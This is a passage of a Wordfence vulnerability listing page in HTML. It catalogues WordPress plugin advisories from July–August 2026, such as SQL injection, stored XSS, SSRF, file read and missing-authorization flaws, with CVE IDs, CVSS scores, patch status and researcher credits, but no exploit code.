<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bcae549f-6a10-4b0d-a8d1-5dcc83e1f2e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfefcc38-764d-4dd9-b098-cdcad475d634" target="_blank" rel="noopener">SpeedyCache &lt;= 1.3.8 &#8211; Authenticated (Administrator+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5114" target="_blank" rel="noopener noreferrer">							CVE-2026-5114						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/speedycache" target="_blank" rel="noopener">SpeedyCache – Cache, Optimization, Performance</a> <span class="wfvr-software-slug">[speedycache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/808cc96dd7906a4eb995e7f5e1d17296.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="808cc96dd7906a4eb995e7f5e1d17296"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chiao-lin-yu" target="_blank" rel="noopener">Chiao-Lin Yu (Steven Meow)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfefcc38-764d-4dd9-b098-cdcad475d634" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d637d7b-7a47-40db-a931-ec7ca723dfab" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.1 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;coupon_code&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15444" target="_blank" rel="noopener noreferrer">							CVE-2026-15444						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d637d7b-7a47-40db-a931-ec7ca723dfab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df5fc86f-e4ba-424b-bece-79abd763cf74" target="_blank" rel="noopener">WP CTA &lt;= 2.1.2 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6089" target="_blank" rel="noopener noreferrer">							CVE-2026-6089						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-sticky-sidebar" target="_blank" rel="noopener">WP CTA – Call Now Button, Sticky Button &amp; Call to Action Builder</a> <span class="wfvr-software-slug">[easy-sticky-sidebar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2440c0aacc02af8dcc176fda663ee4a8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2440c0aacc02af8dcc176fda663ee4a8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-truong" target="_blank" rel="noopener">Nguyen Quang Truong</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/68bf83ddc4a547f6935e2ad92922ee09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68bf83ddc4a547f6935e2ad92922ee09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mai-chu-thao" target="_blank" rel="noopener">Chu Thao Mai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df5fc86f-e4ba-424b-bece-79abd763cf74" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/db14e2b8-3217-4f81-a44e-e50734ef304c" target="_blank" rel="noopener">WP Photo Album Plus &lt;= 9.2.04.002 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;table&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15344" target="_blank" rel="noopener noreferrer">							CVE-2026-15344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">WP Photo Album Plus</a> <span class="wfvr-software-slug">[wp-photo-album-plus]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/db14e2b8-3217-4f81-a44e-e50734ef304c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cec0d64e-7b31-4484-8237-2ab4d730ab86" target="_blank" rel="noopener">WP-Lister Lite for eBay &lt;= 3.8.8 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;orderby&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11973" target="_blank" rel="noopener noreferrer">							CVE-2026-11973						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">WP-Lister Lite for eBay</a> <span class="wfvr-software-slug">[wp-lister-for-ebay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya" target="_blank" rel="noopener">Yousof Nahya</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hamza-nour" target="_blank" rel="noopener">Hamza Nour</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/221461b70f6b0e2c571141647c2528f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="221461b70f6b0e2c571141647c2528f4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yousof-nahya-2" target="_blank" rel="noopener">Yousof Nahya (whoami03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cec0d64e-7b31-4484-8237-2ab4d730ab86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7130f325-a0c4-479d-ac85-94542bdb5a79" target="_blank" rel="noopener">WPvivid &lt;= 0.9.131 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;export_data&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.9</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.9 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17555" target="_blank" rel="noopener noreferrer">							CVE-2026-17555						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">WPvivid — Backup, Migration &amp; Staging</a> <span class="wfvr-software-slug">[wpvivid-backuprestore]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7130f325-a0c4-479d-ac85-94542bdb5a79" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9009880-d4fa-407d-9ef5-d86013190642" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder &lt; 3.1.4 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15669" target="_blank" rel="noopener noreferrer">							CVE-2025-15669						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-form" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[bit-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9009880-d4fa-407d-9ef5-d86013190642" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5a44629-af3f-4bc7-8e68-bbe7df3747f1" target="_blank" rel="noopener">Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns) &lt; 1.8.5.3 &#8211; Authenticated (Administrator+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15675" target="_blank" rel="noopener noreferrer">							CVE-2025-15675						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/charitable" target="_blank" rel="noopener">Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns)</a> <span class="wfvr-software-slug">[charitable]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krugov-artyom" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/krugov-artyom" target="_blank" rel="noopener">Krugov Artyom</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5a44629-af3f-4bc7-8e68-bbe7df3747f1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bbd5e03-2b66-463c-96aa-fc6b44b4f03c" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce – Checkout Manager &lt;= 3.0.5 &#8211; Authenticated (Shop manager+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66475" target="_blank" rel="noopener noreferrer">							CVE-2026-66475						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/checkout-field-editor-and-manager-for-woocommerce" target="_blank" rel="noopener">Checkout Field Editor for WooCommerce – Checkout Manager</a> <span class="wfvr-software-slug">[checkout-field-editor-and-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bbd5e03-2b66-463c-96aa-fc6b44b4f03c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2ad4325-be1f-48c1-b21f-adf9ce3fa2cb" target="_blank" rel="noopener">SMS Alert &lt;= 3.9.7 &#8211; Authenticated (Administrator+) SQL Injection via &#8216;checkout_payment_plans&#8217; and &#8216;order_status&#8217; Settings</a></h4>
<div class="cvss-score-badge">4.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15673" target="_blank" rel="noopener noreferrer">							CVE-2026-15673						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</a> <span class="wfvr-software-slug">[sms-alert]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c2ad4325-be1f-48c1-b21f-adf9ce3fa2cb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af913bb1-eff6-47cd-9471-f74bafda1e52" target="_blank" rel="noopener">Advanced Form Integration &lt;= 2.6.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary MailUp OAuth Token Overwrite via auth_redirect() Function</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16587" target="_blank" rel="noopener noreferrer">							CVE-2026-16587						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-form-integration" target="_blank" rel="noopener">Advanced Form Integration — Connect Forms to 200+ Apps</a> <span class="wfvr-software-slug">[advanced-form-integration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/af913bb1-eff6-47cd-9471-f74bafda1e52" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a32f4dda-f22e-488e-b57a-efc8de8da036" target="_blank" rel="noopener">AnsPress – Question and answer  4.4.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65554" target="_blank" rel="noopener noreferrer">							CVE-2026-65554						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/anspress-question-answer" target="_blank" rel="noopener">AnsPress – Question and answer</a> <span class="wfvr-software-slug">[anspress-question-answer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a32f4dda-f22e-488e-b57a-efc8de8da036" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8de3e34-fa8a-435c-a435-10b8efa19088" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt; 2.4.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14214" target="_blank" rel="noopener noreferrer">							CVE-2026-14214						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
